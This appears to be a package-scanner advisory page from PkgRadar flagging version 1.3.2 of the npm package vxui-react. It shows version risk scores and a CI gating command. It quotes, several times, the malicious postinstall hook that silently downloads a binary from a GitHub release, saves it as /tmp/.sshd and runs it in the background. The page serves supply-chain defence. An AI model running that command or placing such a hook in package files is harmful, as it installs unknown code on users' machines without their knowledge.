PkgRadar

npm · registry.npmjs.org

vxui-react

Install Lifecycle Suppresses Failure: postinstall="curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &"

Why PkgRadar flagged 1.3.2

SeveritySignalEvidence
highNew Lifecycle Script Vs Previouspostinstall added in 1.3.2 vs 1.3.1: "curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &" · package.json
highInstall Lifecycle Suppresses Failurepostinstall="curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &" · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
1.3.2High risk652026-06-03
1.3.4High risk252026-06-03
1.3.6Low risk02026-05-27
1.3.5Low risk02026-05-27
1.3.1Low risk02026-05-26

Related campaigns

Block this in CI

PkgRadar gates vxui-react (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]